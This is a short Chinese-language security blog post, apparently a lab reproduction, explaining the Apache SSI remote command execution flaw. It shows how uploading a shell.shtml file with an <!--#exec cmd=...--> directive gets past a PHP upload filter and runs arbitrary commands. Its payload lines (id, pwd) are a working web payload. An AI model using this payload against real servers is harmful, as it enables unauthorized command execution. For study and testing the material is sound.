温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Apache SSI 远程命令执行漏洞

发布时间:2020-02-25 23:30:00 来源:网络 阅读:2978 作者:小武w 栏目:安全技术

漏洞原理:
在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法执行任意命令。

漏洞复现:
shtml包含有嵌入式服务器方包含命令的文本,在被传送给浏览器之前,服务器会对SHTML文档进行完全地读取、分析以及修改。
正常上传PHP文件是不允许的,我们可以上传一个shell.shtml文件:
<!--#exec cmd="pwd" -->
Apache SSI 远程命令执行漏洞
然后上传就行了
Apache SSI 远程命令执行漏洞
点进去
Apache SSI 远程命令执行漏洞
解析成功,远程命令执行,pwd命令可以随便改。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI